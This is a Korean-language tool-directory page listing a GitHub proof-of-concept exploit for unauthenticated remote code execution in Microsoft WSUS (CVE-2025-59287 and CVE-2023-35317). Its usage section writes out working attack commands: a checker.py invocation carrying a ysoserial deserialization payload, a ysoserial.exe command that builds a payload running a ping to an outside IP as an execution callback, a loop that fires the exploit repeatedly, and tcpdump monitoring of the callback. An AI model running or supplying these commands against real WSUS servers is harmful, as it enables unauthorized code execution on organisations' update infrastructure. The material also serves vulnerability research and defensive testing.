Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-59287-PoC — Microsoft Windows Server Update Service(WSUS)의 인증되지 않은 RCE PoC - CVE-2025-59287 & CVE-2023-35317 | Kitploit
도구/GitHubGitHub/m507/cve-2025-59287-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubm507/cve-2025-59287-poc

CVE-2025-59287-PoC

Microsoft Windows Server Update Service(WSUS)의 인증되지 않은 RCE PoC - CVE-2025-59287 & CVE-2023-35317

저장소 보기
1438개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-59287 / CVE-2023-35317 PoC

CVE-2025-59287 내부: WSUS의 SoapFormatter RCE: https://shellcode.blog/wsus-cve-2025-59287-investigation/

이 소프트웨어는 순수하게 학술 연구와 효과적인 방어 기법 개발을 목적으로 제작되었으며, 명시적으로 승인된 경우를 제외하고 시스템을 공격하는 데 사용할 의도가 없습니다. 프로젝트 유지관리자는 이 소프트웨어의 오용에 대해 책임을 지지 않습니다. 책임감 있게 사용하세요.

사용법

필수 플래그:

  • --target-url – 대상 WSUS 서버 기본 URL (예: http://WIN-246JC0TE3BB.vuln.local:8530)
  • --cve – CVE-2023-35317 또는 CVE-2025-59287 중 하나

선택 플래그:

  • --dns-name – SOAP 요청에 사용되는 클라이언트 DNS 이름 (기본값: bugcrowd.local)
  • --random – --dns-name 앞에 임의의 하위 도메인을 붙여 각 실행이 새 클라이언트로 보이게 합니다
  • --payload – 사용자 정의 base64 인코딩 ysoserial 페이로드. 생략하면 선택한 --cve에 대해 내장 페이로드가 사용됩니다
  • --debug – 상세 디버그 로깅 활성화 ([DEBUG] 줄)

CVE-2025-59287

  1. python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2025-59287 --random

alt text

수동 트리거 – CVE-2023-35317

  1. (선택 사항) 내장 페이로드를 사용하지 않으려면 Ysoserial.Net을 사용하여 페이로드를 생성합니다 (또는 내장 페이로드에 의존합니다).
  2. 실행: python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --dns-name bugcrowd.local --cve CVE-2023-35317 --random
  3. WSUS 콘솔을 엽니다

alt text

자동 트리거 – CVE-2023-35317

  1. ./ysoserial.exe -g RolePrincipal -f BinaryFormatter -c 'ping 18.118.100.100' -o base64 (또는 --cve CVE-2023-35317에 대해 내장 페이로드에 의존합니다)
  2. for i in `seq 1 300`; do sleep 1; python3 checker.py --target-url http://WIN-246JC0TE3BB.vuln.local:8530 --payload BASE64_YSOSERIAL_BLOB --dns-name bugcrowd.local --cve CVE-2023-35317 --random ;done
  3. 1~3분 기다리면 서비스 프로세스에서 실행됩니다.
  4. ICMP 연결을 모니터링합니다: sudo tcpdump -l -n -i any icmp | while read line; do echo "$line"; echo -ne '\a'; done

alt text

도구 다운로드